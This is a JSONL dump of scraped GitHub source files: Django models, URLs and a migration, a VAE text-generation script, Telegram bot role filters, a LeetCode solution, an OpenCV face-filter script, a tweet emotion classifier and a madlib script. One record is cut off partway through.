+{"seq_id":"74281746779","text":"# -*- coding: utf-8 -*-\nimport itertools\nimport time\n\nfrom django.core.validators import MinLengthValidator\nfrom django.db import models\nfrom django.db.models.signals import post_save, pre_delete, post_delete\nfrom django.urls import reverse\nfrom mptt.fields import TreeForeignKey\nfrom mptt.managers import TreeManager\nfrom mptt.models import MPTTModel\nfrom email.utils import formatdate\nfrom main.mixins.models import SitePageModel\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Post(SitePageModel):\n LIST_VIEW_HEADING = _(u'All posts')\n comments_count = models.IntegerField(_(u'Comments count'), default=0)\n\n class Meta:\n verbose_name = _(u'Post')\n verbose_name_plural = _(u'Posts')\n ordering = ('last_modified',)\n\n def get_comments(self, root=None):\n if root:\n return root.get_children()\n else:\n return Comment.tree.filter(post=self, level__lte=2)\n\n def get_comments_count(self):\n return self.comments_count\n\n @classmethod\n def get_breadcrumbs_base(cls):\n return [\n {\n 'title': cls.LIST_VIEW_HEADING,\n 'url': reverse('post-list')\n },\n ]\n\n def get_breadcrumbs(self):\n return itertools.chain(\n self.get_breadcrumbs_base(),\n [\n {\n 'title': self.title,\n 'url': self.get_absolute_url()\n }\n ]\n )\n\n @models.permalink\n def get_absolute_url(self):\n return 'post-detail', (), {'slug': self.slug}\n\n\nclass Comment(MPTTModel):\n user = models.ForeignKey('auth.User', verbose_name=_(u'User'))\n post = models.ForeignKey('Post', verbose_name=_(u'Post'))\n\n message = models.TextField(\n verbose_name=_(u'Message'),\n max_length=1000,\n validators=[MinLengthValidator(5)]\n )\n\n last_modified = models.DateTimeField(\n auto_created=True,\n auto_now=True\n )\n\n parent_comment = TreeForeignKey(\n 'self',\n verbose_name=_(u'parent comment'),\n blank=True,\n null=True\n )\n\n tree = TreeManager()\n\n def __unicode__(self):\n return _(u'From %s [%s]') % (self.user, self.get_last_modified())\n\n class Meta:\n verbose_name = _(u'Comment')\n verbose_name_plural = _(u'Comments')\n\n class MPTTMeta:\n parent_attr = 'parent_comment'\n order_insertion_by = 'last_modified'\n\n def get_last_modified(self):\n return formatdate(time.mktime(self.last_modified.timetuple()), usegmt=True)\n\n\ndef update_post(sender, instance, **kwargs):\n instance.post.comments_count = instance.post.comment_set.all().count()\n instance.post.save()\n Comment.tree.rebuild()\n\npost_save.connect(update_post, Comment)\npost_delete.connect(update_post, Comment)\n","repo_name":"Enweave/ex_strategia","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"32421643742","text":"\"\"\" VAE for Text Generation\nThis is for Module 1: Candidates Generation.\nUsage: python VAE_Text_Generation.py --dataset reddit\n\"\"\"\nimport argparse\nimport math\nimport os\nimport numpy as np\nimport torch as T\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom utility.VAE_Text_Generation.dataset import get_iterators\nfrom utility.VAE_Text_Generation.helper_functions import get_cuda\nfrom utility.VAE_Text_Generation.model import VAE\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, default=8)\nparser.add_argument('--n_vocab', type=int, default=12000)\nparser.add_argument('--epochs', type=int, default=1000)\nparser.add_argument('--n_hidden_G', type=int, default=512)\nparser.add_argument('--n_layers_G', type=int, default=2)\nparser.add_argument('--n_hidden_E', type=int, default=512)\nparser.add_argument('--n_layers_E', type=int, default=1)\nparser.add_argument('--n_z', type=int, default=100)\nparser.add_argument('--word_dropout', type=float, default=0.5)\nparser.add_argument('--rec_coef', type=float, default=7)\nparser.add_argument('--lr', type=float, default=0.00001)\nparser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--n_highway_layers', type=int, default=2)\nparser.add_argument('--n_embed', type=int, default=300)\nparser.add_argument('--out_num', type=int, default=30000)\nparser.add_argument('--unk_token', type=str, default=\"<unk>\")\nparser.add_argument('--pad_token', type=str, default=\"<pad>\")\nparser.add_argument('--start_token', type=str, default=\"<sos>\")\nparser.add_argument('--end_token', type=str, default=\"<eos>\")\nparser.add_argument('--dataset', type=str, default=\"reddit\")\nparser.add_argument('--training', action='store_true')\nparser.add_argument('--resume_training', action='store_true')\n\n\nopt = parser.parse_args()\nprint(opt)\nsave_path = \"tmp/saved_VAE_models/\" + opt.dataset + \".tar\"\nprint(save_path)\nif not os.path.exists(\"tmp/saved_VAE_models\"):\n os.makedirs(\"tmp/saved_VAE_models\")\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = str(opt.gpu)\n\ncandidates_path = opt.dataset + '_for_VAE.txt'\ntrain_iter, val_iter, vocab = get_iterators(opt, path='./data/', fname=candidates_path)\nopt.n_vocab = len(vocab)\nif opt.training:\n vae = VAE(opt)\n vae.embedding.weight.data.copy_(vocab.vectors) #Initialize trainable embeddings with pretrained glove vectors\n vae = get_cuda(vae)\n trainer_vae = T.optim.Adam(vae.parameters(), lr=opt.lr)\nelse:\n checkpoint = T.load(save_path)\n vae = checkpoint['vae_dict']\n trainer_vae = checkpoint['vae_trainer']\n if 'opt' in checkpoint:\n opt_old = checkpoint['opt']\n print(opt_old)\n\n\ndef create_generator_input(x, train):\n G_inp = x[:, 0:x.size(1)-1].clone()\t #input for generator should exclude last word of sequence\n if train == False:\n return G_inp\n r = np.random.rand(G_inp.size(0), G_inp.size(1)) #Perform word_dropout according to random values (r) generated for each word\n for i in range(len(G_inp)):\n for j in range(1, G_inp.size(1)):\n if r[i, j] < opt.word_dropout and G_inp[i, j] not in [vocab.stoi[opt.pad_token], vocab.stoi[opt.end_token]]:\n G_inp[i, j] = vocab.stoi[opt.unk_token]\n return G_inp\n\n\ndef train_batch(x, G_inp, step, train=True):\n logit, _, kld = vae(x, G_inp, None, None)\n logit = logit.view(-1, opt.n_vocab)\t #converting into shape (batch_size*(n_seq-1), n_vocab) to facilitate performing F.cross_entropy()\n x = x[:, 1:x.size(1)]\t #target for generator should exclude first word of sequence\n x = x.contiguous().view(-1)\t #converting into shape (batch_size*(n_seq-1),1) to facilitate performing F.cross_entropy()\n rec_loss = F.cross_entropy(logit, x)\n kld_coef = (math.tanh((step - 15000)/1000) + 1) / 2\n # kld_coef = min(1,step/(200000.0))\n loss = opt.rec_coef*rec_loss + kld_coef*kld\n if train==True:\t #skip below step if we are performing validation\n trainer_vae.zero_grad()\n loss.backward()\n trainer_vae.step()\n return rec_loss.item(), kld.item()\n\n\n# def load_model_from_checkpoint():\n # global vae, trainer_vae\n # checkpoint = T.load(save_path)\n # vae.load_state_dict(checkpoint['vae_dict'])\n # trainer_vae.load_state_dict(checkpoint['vae_trainer'])\n # return checkpoint['step'], checkpoint['epoch']\n\n\ndef training():\n start_epoch = step = 0\n if opt.resume_training:\n step, start_epoch = checkpoint['step'], checkpoint['epoch']\n for epoch in range(start_epoch, opt.epochs):\n vae.train()\n train_rec_loss = []\n train_kl_loss = []\n for batch in train_iter:\n x = get_cuda(batch.text) \t #Used as encoder input as well as target output for generator\n G_inp = create_generator_input(x, train=True)\n rec_loss, kl_loss = train_batch(x, G_inp, step, train=True)\n train_rec_loss.append(rec_loss)\n train_kl_loss.append(kl_loss)\n step += 1\n\n vae.eval()\n valid_rec_loss = []\n valid_kl_loss = []\n for batch in val_iter:\n x = get_cuda(batch.text)\n G_inp = create_generator_input(x, train=False)\n with T.autograd.no_grad():\n rec_loss, kl_loss = train_batch(x, G_inp, step, train=False)\n valid_rec_loss.append(rec_loss)\n valid_kl_loss.append(kl_loss)\n\n train_rec_loss = np.mean(train_rec_loss)\n train_kl_loss = np.mean(train_kl_loss)\n valid_rec_loss = np.mean(valid_rec_loss)\n valid_kl_loss = np.mean(valid_kl_loss)\n\n print(\"No.\", epoch, \"T_rec:\", '%.2f' % train_rec_loss, \"T_kld:\", '%.2f' % train_kl_loss, \"V_rec:\", '%.2f' % valid_rec_loss, \"V_kld:\", '%.2f' % valid_kl_loss)\n if epoch >= 50 and epoch % 10 == 0:\n print('save model ' + str(epoch) + '...')\n T.save({'epoch': epoch + 1, 'vae_dict': vae, 'vae_trainer': trainer_vae, 'step': step, 'opt': opt}, save_path)\n generate_sentences(5)\n\n\ndef generate_sentences(n_examples, save=0):\n vae.eval()\n out = []\n for i in tqdm(range(n_examples)):\n z = get_cuda(T.randn([1, vae.n_z]))\n h_0 = get_cuda(T.zeros(vae.generator.n_layers_G, 1, vae.generator.n_hidden_G))\n c_0 = get_cuda(T.zeros(vae.generator.n_layers_G, 1, vae.generator.n_hidden_G))\n G_hidden = (h_0, c_0)\n G_inp = T.LongTensor(1, 1).fill_(vocab.stoi[opt.start_token])\n G_inp = get_cuda(G_inp)\n out_str = \"\"\n while (G_inp[0][0].item() != vocab.stoi[opt.end_token]) and (G_inp[0][0].item() != vocab.stoi[opt.pad_token]):\n with T.autograd.no_grad():\n logit, G_hidden, _ = vae(None, G_inp, z, G_hidden)\n probs = F.softmax(logit[0], dim=1)\n G_inp = T.multinomial(probs, 1)\n out_str += (vocab.itos[G_inp[0][0].item()]+\" \")\n print(out_str[:-6])\n out.append(out_str[:-6])\n if save:\n original = []\n with open('./data/' + candidates_path, 'r') as fin:\n for line in fin:\n original.append(line.strip())\n fname = './data/' + opt.dataset + '_candidates.txt'\n with open(fname, 'w') as fout:\n for i in out + original:\n fout.write(i)\n fout.write('\\n')\n\n\nif __name__ == '__main__':\n if opt.training or opt.resume_training:\n training()\n generate_sentences(opt.out_num, save=1)\n else:\n generate_sentences(opt.out_num, save=1)\n","repo_name":"WanzhengZhu/GPS","sub_path":"VAE_Text_Generation.py","file_name":"VAE_Text_Generation.py","file_ext":"py","file_size_in_byte":7608,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"70538132060","text":"import logging\nfrom typing import Optional, Union, Collection\n\nfrom aiogram import Dispatcher\nfrom aiogram.dispatcher.filters import BoundFilter\nfrom aiogram.dispatcher.handler import ctx_data\nfrom aiogram.types import CallbackQuery\nfrom aiogram.types.base import TelegramObject\n\nfrom ..config import Role\n\n\nclass RoleFilter(BoundFilter):\n key = 'role'\n\n def __init__(\n self,\n role: Union[None, Role, Collection[Role]] = None,\n ):\n if role is None:\n self.roles = None\n elif isinstance(role, Role):\n self.roles = {role}\n else:\n self.roles = set(role)\n\n async def check(self, obj: TelegramObject):\n if self.roles is None:\n return True\n data = ctx_data.get()\n return data.get(\"role\") in self.roles\n\n\nclass SuperuserFilter(BoundFilter):\n key = 'is_superuser'\n\n def __init__(self, is_superuser: Optional[bool] = None):\n self.is_superuser = is_superuser\n\n async def check(self, obj: TelegramObject):\n if self.is_superuser is None:\n return True\n data = ctx_data.get()\n\n return (data.get(\"role\") is Role.SUPERUSER) == self.is_superuser\n\n\nclass FileSelectionMenuAccessFilter(BoundFilter):\n\n async def check(self, call: CallbackQuery):\n state = Dispatcher.get_current().current_state()\n state_data = await state.get_data()\n applicant_role = state_data.get('role')\n free_files_in_google_folder = state_data.get('free_files')\n if applicant_role == Role.EMPLOYEE.value and free_files_in_google_folder:\n return {'files': free_files_in_google_folder}\n","repo_name":"DerSerhii/WorkScheduleBot","sub_path":"schedulebot/filters/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40666049942","text":"class Solution:\n def maxVowels(self, s: str, k: int) -> int:\n \n maxVowels = -1\n idx = 0\n size = len(s)\n count = 0\n vowels = [\"a\",\"e\",\"i\",\"o\",\"u\"]\n \n for i in range(0,k):\n if s[i] in vowels:\n count+=1\n \n #print(idx,count)\n maxVowels = max(count,maxVowels)\n idx = 1\n \n while(idx<=(size-k+1)):\n if idx-1 >= 0 and s[idx-1] in vowels:\n count-=1\n if (idx+k-1)"}
+{"text":"/', views.StudentAPI.as_view()),\n# path('swagger/', schema_view.with_ui('swagger', cache_timeout=0),name='schema-swagger-ui'),\n# ]\n\n\n# GenericAPIView and Model Mixing\n\n# urlpatterns = [\n# path('admin/', admin.site.urls),\n# path('studentapi/', views.LCStudentList.as_view()),\n# path('studentapi/<int:pk>/', views.RUDStudentAPI.as_view()),\n \n# ]\n \nurlpatterns = [\n path('admin/', admin.site.urls),\n path('studentapi/', views.StudentLC.as_view()),\n path('studentapi/<int:pk>/', views.StudentRUD.as_view()),\n \n]\n \n\n\n","repo_name":"maheenkhalid-coder/CRUD-api","sub_path":"crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3501940632","text":"import cv2\nimport imutils\n\ncap = cv2.VideoCapture(0)\n\nfilter = cv2.imread(r'input_assets\\2022logo.png',cv2.IMREAD_UNCHANGED)\n\n#instantiate classifier\nfaceDet = cv2.CascadeClassifier('input_assets\haarcascade_frontalface_default.xml')\n\n\nvideo = []\n\n\nwhile True:\n\n ret, frame = cap.read()\n if not ret: break\n frame = cv2.flip(frame,1)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\n\n faces = faceDet.detectMultiScale(gray, 1.2,6)\n\n for (x,y,w,h) in faces:\n #cv2.rectangle(frame,(x,y), (x+w, y+h),(0,255,0), 2)\n \n resizedFilter = imutils.resize(filter, width=w)\n heightFilter = resizedFilter.shape[0]\n widthFilter = w\n\n #This is to make the filter show a little bit below the upper border of the face rectangle.\n showBelow = heightFilter // 5\n\n dif = 0\n\n yFilter = y-heightFilter+showBelow\n # Adding filter to frame on top of the face detected\n if yFilter >= 0:\n filterArea = frame[yFilter:y+showBelow, x:x+w] \n else:\n dif = abs(yFilter)\n filterArea = frame[0:y+showBelow,x:x+w]\n \n\n filterMask = resizedFilter[:,:, 3]\n \n filterMaskInv = cv2.bitwise_not(filterMask)\n\n bgBlack = cv2.bitwise_and(resizedFilter,resizedFilter,mask=filterMask)\n bgBlack = bgBlack[dif:,:,:3]\n\n bgFrame = cv2.bitwise_and(filterArea,filterArea, mask=filterMaskInv[dif:,:])\n\n result = cv2.add(bgBlack,bgFrame)\n\n if yFilter >= 0:\n frame[yFilter:y+showBelow, x:x+w] = result\n else:\n frame[0:y+showBelow, x:x+w] = result\n \n video.append(frame)\n cv2.imshow('video', frame)\n \n\n k = cv2.waitKey(1)\n\n if k == ord('q'):\n break\n\n\n# FPS = cap.get(5) #Frames\n\n# Width = int(cap.get(3)) #Width\n# Height = int(cap.get(4)) #Height\n\n# fourcc = cv2.VideoWriter_fourcc(*'avc1')\n# out = cv2.VideoWriter(r\"output_assets\\face_filter.mp4\",fourcc, FPS, (Width,Height)) \n\n# for img in video:\n# out.write(img)\n# out.release()\n# cap.release()","repo_name":"Alefig12/opencv-learning","sub_path":"day11/28-faceFilters.py","file_name":"28-faceFilters.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"11339575793","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#pip install textblob\n\n\n# In[4]:\n\n\n#pip install emot\n\n\n# In[ ]:\n\n\n#pip install\n\n\n# In[ ]:\n\n\n#pip install\n\n\n# In[7]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport collections\nimport nltk\nimport io\nfrom textblob import Word\nimport re\nimport sys, os, csv\nimport string\nfrom sklearn import preprocessing\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom emot.emo_unicode import UNICODE_EMOJI #,EMOTICONS\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import wordnet\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom collections import Counter\n\n\n# # Data Cleaning\n\n# In[8]:\n\n\ndef word_prob(word): return dictionary[word] / total\ndef words(text): return re.findall('[a-z]+', text.lower())\ndictionary = Counter(words(open('dataset/wordlists/merged.txt').read()))\nmax_word_length = max(map(len, dictionary))\ntotal = float(sum(dictionary.values()))\n\ndef viterbi_segment(text):\n probs, lasts = [1.0], [0]\n for i in range(1, len(text) + 1):\n prob_k, k = max((probs[j] * word_prob(text[j:i]), j)\n for j in range(max(0, i - max_word_length), i))\n probs.append(prob_k)\n lasts.append(k)\n words = []\n i = len(text)\n while 0 < i:\n words.append(text[lasts[i]:i])\n i = lasts[i]\n words.reverse()\n return words, probs[-1]\n\ndef fix_hashtag(text):\n text = text.group().split(\":\")[0]\n text = text[1:] # remove '#'\n try:\n test = int(text[0])\n text = text[1:]\n except:\n pass\n output = ' '.join(viterbi_segment(text)[0])\n return output\n\ndef prep(tweet):\n \"\"\"pattern = re.compile(r\"(.)\\1{2,}\")\n tweet = pattern.sub(r\"\\1\\1\", str(tweet))\n tweet = re.sub(r'http.?://[^\\s]+[\\s]?', '', str(tweet))\n punct = string.punctuation\n trantab = str.maketrans(punct, len(punct) * ' ') # Every punctuation symbol will be replaced by a space\n tweet = tweet.translate(trantab)\n tweet = tweet.lower()\n tweet = tweet.strip()\"\"\"\n \n tweet = tweet.lower()\n tweet = re.sub(\"(#[A-Za-z0-9]+)\", fix_hashtag, tweet)\n tweet = ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n \n tweet = re.sub('\\d+', '', str(tweet))\n def get_wordnet_pos(word):\n tag = nltk.pos_tag([word])[0][1][0].upper()\n tag_dict = {\"J\": wordnet.ADJ, \"N\": wordnet.NOUN, \"V\": wordnet.VERB, \"R\": wordnet.ADV}\n return tag_dict.get(tag, wordnet.NOUN) \n \n ps = PorterStemmer()\n words = tweet.split()\n lemmatizer = WordNetLemmatizer()\n lemma_words = [lemmatizer.lemmatize(word, get_wordnet_pos(word)) for word in words]\n tweet = \" \".join(lemma_words)\n \n stopwords_list = stopwords.words('english')\n # Some words which might indicate a certain sentiment are kept via a whitelist\n whitelist = [\"n't\", \"not\", \"no\"]\n words = tweet.split()\n clean_words = [word for word in words if (word not in stopwords_list or word in whitelist) and len(word) > 1]\n tweet = \" \".join(clean_words)\n \n tweet = tweet.strip()\n return tweet\n\ndef 
vectorise_label(label):\n if label == \"empty\":return 0\n elif label == \"sadness\":return 2\n elif label == \"enthusiasm\":return 1\n elif label == \"neutral\":return 0\n elif label == \"worry\":return 2\n elif label == \"surprise\":return 1\n elif label == \"love\":return 3\n elif label == \"fun\":return 1\n elif label == \"hate\":return 4\n elif label == \"happiness\":return 1\n elif label == \"boredom\":return 0\n elif label == \"relief\":return 1\n elif label == \"anger\":return 4\n\n\n# In[ ]:\n\n\ndata1 = pd.read_csv(\"crawled_csv/processes/sad_processes.csv\", sep=',', encoding='utf-8')\ndataWriter = csv.writer(open('crawled_csv/prep/sad_prep.csv', 'w'), delimiter=',',lineterminator=\"\\n\")\ntotal = 2000\nfor i in range(2000):\n tweet= prep(data1.iloc[:,0][i])\n dataWriter.writerow([tweet, 2]) \nprint(\"Done!\")\n\n\n# In[225]:\n\n\ncount = 0\nwith open('crawled_csv/prep/sad_prep.csv', encoding = \"utf8\") as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n count+=1\nprint(count)\n\n\n# In[245]:\n\n\ndata2 = pd.read_csv('dataset/data/text_emotion.csv', sep=',', encoding='utf-8')\nprint(\"Dataset shape:\",data2.shape)\nprint(data2.sentiment[0],\":\",data2.content[0])\n\n\n# In[251]:\n\n\ndataWriter = csv.writer(open('cleaned_data/data_prep.csv', 'w', encoding='utf-8'), delimiter=',',lineterminator=\"\\n\")\n\ntotal = 40000\nfor i in range(40000):\n tweet= prep(data2.content[i])\n dataWriter.writerow([tweet, str(vectorise_label(data2.sentiment[i]))])\n \nprint(\"Progress: \",100,\"\\nComplete!\")\n\n\n# In[252]:\n\n\ncount = 0\nwith open('cleaned_data/data_prep.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n count+=1\nprint(count)\n\n\n# ## Cleaned data file\n\n# In[38]:\n\n\ndata_train = pd.read_csv('cleaned_data/emotion_data_prep.csv', sep=',', encoding='utf-8')\nprint(\"Dataset shape:\",data_train.shape)\n\n\n# In[39]:\n\n\ncount = data_train.iloc[:,1].value_counts()\nplt.figure(figsize=(9,7))\nsns.barplot(count.index, count.values, alpha=0.8, palette=\"plasma\")\nplt.ylabel('Count', fontsize=12)\nplt.xlabel('Emotions', fontsize=12)\nplt.show()\n# 0 = neutral\n# 1 = happy\n# 2 = sad\n# 3 = love\n# 4 = anger\n\n\n# # Test Train Split\n\n# In[9]:\n\n\nX_train = data_train.iloc[:,0][:49611]\n#[:47583]\ny_train = data_train.iloc[:,-1][:49611]\n#[:47583]\nX_val = data_train.iloc[:,0][49612:]\n#[47584:]\ny_val = data_train.iloc[:,-1][49612:]\n#[47584:]\n\n\n# # TF-IDF Vectorizer\n\n# In[10]:\n\n\ntfidf = TfidfVectorizer(max_features=1000, analyzer='word',ngram_range=(1,3))\nX_train_tfidf = tfidf.fit_transform(X_train.astype('U'))\n# use transform (not fit_transform) so the validation split reuses the training vocabulary\nX_val_tfidf = tfidf.transform(X_val.astype('U'))\nprint(tfidf.vocabulary_)\n\n\n# In[11]:\n\n\nbow = tfidf.fit_transform(data_train.iloc[:,0].astype('U'))\nword_freq = dict(zip(tfidf.get_feature_names(), np.asarray(bow.sum(axis=0)).ravel()))\nword_counter = collections.Counter(word_freq)\nword_counter_df = pd.DataFrame(word_counter.most_common(30), columns = ['word', 'freq'])\nfig, ax = plt.subplots(figsize=(15, 10))\nsns.barplot(x=\"word\", y=\"freq\", data= word_counter_df, ax=ax, palette=\"plasma\")\nplt.show();\n\n\n# # Count Vectorizer\n\n# In[12]:\n\n\n# Extracting Count Vectors Parameters\ncount_vect = CountVectorizer(analyzer='word')\ncount_vect.fit(data_train.iloc[:,0].astype('U'))\nX_train_count = count_vect.transform(X_train.astype('U'))\nX_val_count = count_vect.transform(X_val.astype('U'))\nprint(count_vect.vocabulary_)\n\n\n# In[13]:\n\n\nbow = 
count_vect.fit_transform(data_train.iloc[:,0].astype('U'))\nprint(bow.shape)\nword_freq = dict(zip(count_vect.get_feature_names(), np.asarray(bow.sum(axis=0)).ravel()))\nword_counter = collections.Counter(word_freq)\nword_counter_df = pd.DataFrame(word_counter.most_common(30), columns = ['word', 'freq'])\nfig, ax = plt.subplots(figsize=(15, 10))\nsns.barplot(x=\"word\", y=\"freq\", data= word_counter_df, ax=ax, palette=\"plasma\")\nplt.show();\n\n\n# # Building models using different classifiers (TF-IDF vectorizer)\n\n# ### Model 1: Multinomial Naive Bayes Classifier\n\n# In[14]:\n\n\nnb = MultinomialNB()\nnb.fit(X_train_tfidf, y_train)\ny_pred = nb.predict(X_val_tfidf)\nprint('naive bayes tfidf accuracy %s' % accuracy_score(y_pred, y_val))\n# naive bayes tfidf accuracy 0.3837284308982422\n\n\n# ### Model 2: Linear SVM\n\n# In[15]:\n\n\nlsvm = SGDClassifier(alpha=0.001, random_state=5, max_iter=15, tol=None)\nlsvm.fit(X_train_tfidf, y_train)\ny_pred = lsvm.predict(X_val_tfidf)\nprint('svm using tfidf accuracy %s' % accuracy_score(y_pred, y_val))\n# svm tfidf accuracy 0.38493791323980003\n\n\n# ### Model 3: logistic regression\n\n# In[16]:\n\n\nlogreg = LogisticRegression(C=1, max_iter=1000)\nlogreg.fit(X_train_tfidf, y_train)\ny_pred = logreg.predict(X_val_tfidf)\nprint('log reg tfidf accuracy %s' % accuracy_score(y_pred, y_val))\n# log reg tfidf accuracy 0.4013868730849863\n\n\n# # Building models using different classifiers (Count vectorizer)\n\n# ### Model 1: Multinomial Naive Bayes Classifier\n\n# In[19]:\n\n\nnb1 = MultinomialNB()\nnb1.fit(X_train_count, y_train)\ny_pred = nb1.predict(X_val_count)\nprint('naive bayes count vectors accuracy %s' % accuracy_score(y_pred, y_val))\n# naive bayes count_vect accuracy 0.584663763909047\n\n\n# ### Model 2: Logistic Regression\n\n# In[24]:\n\n\nlogreg1 = LogisticRegression(C=1, max_iter=500)\nlogreg1.fit(X_train_count, y_train)\ny_pred = logreg1.predict(X_val_count)\nprint('log reg count vectors accuracy %s' % accuracy_score(y_pred, y_val))\n# log reg count_vect accuracy 0.6247379454926625\n\n\n# ### Model 3: Linear SVM\n\n# In[34]:\n\n\nlsvm1 = SGDClassifier(alpha=0.001, random_state=5, max_iter=2, tol=None)\nlsvm1.fit(X_train_count, y_train)\ny_pred = lsvm1.predict(X_val_count)\nprint('lsvm using count vectors accuracy %s' % accuracy_score(y_pred, y_val))\n# svm count_vect accuracy 0.620061280438639\n\n\n# # Testing\n\n# In[22]:\n\n\ntweets = pd.DataFrame([\"For instance, giving a kiss to your younger sibling daily after waking up in the morning and showing him how much you love them. For some happiness means loving life and seeing others happy. While some finds happiness in writing stories. Some conquer happiness in being simple yet the best person they can ever be. Everyone has their own unique way to feel happy by finding things that they never expected to find.\", # happy\n \"Love is the key to happiness. We all want to lead a happy life. People look around for happiness in power, fashion, wealth, drugs etc. But these things can only give temporary pleasures. The power of love can create miracles. Love can create unity among nations and its citizens. Love is the most beautiful feeling in the world. Love has given different meaning by different people depending upon how they have experienced this wonderful feeling.\", # love\n \"One day I was studying in my room when, all of a sudden, i heard hot words being exchanged between two persons in the street. 
I paid no attention, thinking it would be a minor quarrel but soon I heard the voices of a large number of people. I peeped from the window and saw that there was a street quarrel. I went downstairs and reached the spot in the twinkling of an eyes. I was at my wits end on seeing that both of them had come to blows. The people were standing around them and enjoying their quarrel but none tried to pacify them.\", # sad\n \"I am so angry at you!!!!!\", # anger\n \"you ve hit a new low with a danger of blm fascist slogan please stop it before too late stop\", # anger\n \"I love my doggg\", # love\n \"I think i'm gonna be sick :'‑(\", # sad\n \"I hate you so much\", # anger\n \"I'm at work\", # neutral\n \"@TheTombert i was watching Harpers Island, lol... there was no vodka involved\", # neutral\n \"sometimes i wish things could go back to the way they were the beginning of last summer\", # sad\n \"it's your 18th birthday finally!!! yippeeeee\", # happy\n \"still waiting in line\", # neutral\n \"aarrgghh - fu*k.....a hose has leaked water all over the new floating floor\", # anger\n \"that b*tch is so ugly\", # anger\n \"oh no he is hospitalised!!!\", # sad\n ])\n\ntweet_count = count_vect.transform(tweets[0])\n\n\n# In[43]:\n\n\n#Predicting the emotion of the tweet \ntweet_pred = logreg1.predict(tweet_count)\nprint(tweet_pred)\ntweets[0]\n# 0 = neutral\n# 1 = happy\n# 2 = sad\n# 3 = love\n# 4 = anger\n\n\n# In[44]:\n\n\nfinal_result=tweets.copy()\n\n\n# In[45]:\n\ndef output():\n final_result['result']=tweet_pred\n final_result=final_result.rename(columns={0:\"tweets\"})\n final_result=final_result.rename(columns={\"result\":\"predicted_emotion\"})\n final_result=final_result.replace({0: 'Neutral', 1: 'Happy', 2: 'Sad', 3: 'Love', 4: 'Anger'})\n final_result\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"lancelooottt/MindGraph","sub_path":"app/src/main/python/MLModels.py","file_name":"MLModels.py","file_ext":"py","file_size_in_byte":12184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31261169723","text":"f = open(\"madlibtest.txt\", \"r\")\n#empty string to store story\nstory = ''\n\nlineno = 1\nmadlib = \"\"\ntext = \"\"\nfor line in f:\n if line.startswith(\"*\"):\n #output as command, strip\n text = input('Give me a(n) ' + line[1:].strip() + ': ')\n else:\n #put lint onto madlib\n text = line\n #put text onto madlib\n madlib = madlib + \" \" + text.strip()\n#why is my madlib so awkward looking?\nprint(\"here is your madlib: \"+madlib)\nf.close()\n\nimport os\n\n#get path of this directory (because i sure don't know it)\ndir_path = os.getcwd()\n#put all filenames into dir_list\ndir_list = os.listdir(dir_path)\n\n#make list for text files\ntxt_files = []\nfor f in dir_list:\n #filter by those ending in .txt\n if f.endswith(\".txt\"):\n txt_files.append(f)\n\n#print text files\nprint(\"text files in this directory:\")\nfor t in txt_files:\n print(t)","repo_name":"rlsoderberg/rebeccaCS100","sub_path":"cs100a/module5/amadlibs.py","file_name":"amadlibs.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33078337299","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Game',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('grid_width', models.IntegerField()),\n ('grid_height', models.IntegerField()),\n ('observer_log', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='Move',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order', models.IntegerField(db_index=True)),\n ('game', models.ForeignKey(to='battleship_viewer.Game')),\n ],\n options={\n 'ordering': ['order'],\n },\n ),\n migrations.CreateModel(\n name='Player',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Ship',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('game', 